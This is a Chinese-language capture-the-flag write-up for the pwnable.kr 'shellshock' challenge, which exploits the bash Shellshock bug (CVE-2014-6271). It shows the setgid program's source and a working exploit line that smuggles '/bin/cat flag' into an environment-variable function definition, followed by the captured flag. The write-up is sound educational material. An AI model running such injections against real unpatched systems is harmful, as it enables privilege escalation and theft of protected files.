shellshock-writeup-pwnabble.kr-shell的漏洞

题面:

1
2
3
4
Mommy, there was a shocking news about bash.
I bet you already know, but lets just make it sure :)

ssh shellshock@pwnable.kr -p2222 (pw:guest)

文件目录及权限:

1
2
3
4
5
6
shellshock@ubuntu:~$ ls -l
total 960
-r-xr-xr-x 1 root shellshock 959120 Oct 12 2014 bash
-r--r----- 1 root shellshock_pwn 47 Oct 12 2014 flag
-r-xr-sr-x 1 root shellshock_pwn 8547 Oct 12 2014 shellshock
-r--r--r-- 1 root root 188 Oct 12 2014 shellshock.c

代码:

1
2
3
4
5
6
7
8
shellshock@ubuntu:~$ cat shellshock.c
#include <stdio.h>
int main(){
setresuid(getegid(), getegid(), getegid());
setresgid(getegid(), getegid(), getegid());
system("/home/shellshock/bash -c 'echo shock_me'");
return 0;
}

一看是shocking news,肯定是什么重大新闻比如曝出的严重漏洞,搜一下bash 漏洞果然发现了漏洞bash漏洞

里面说到:env x='() { :;}; echo vulnerable' bash -c "echo this is a test"如果输出为echo后面的内容即代表存在此漏洞,这就好办了,可以直接cat flag了

POC&flag:

1
2
shellshock@ubuntu:~$ env x='() { :;}; /bin/cat flag' bash -c "./shellshock"
only if I knew CVE-2014-6271 ten years ago..!!
# CTF, PWN

评论

Your browser is out-of-date!

Update your browser to view this website correctly. Update my browser now

×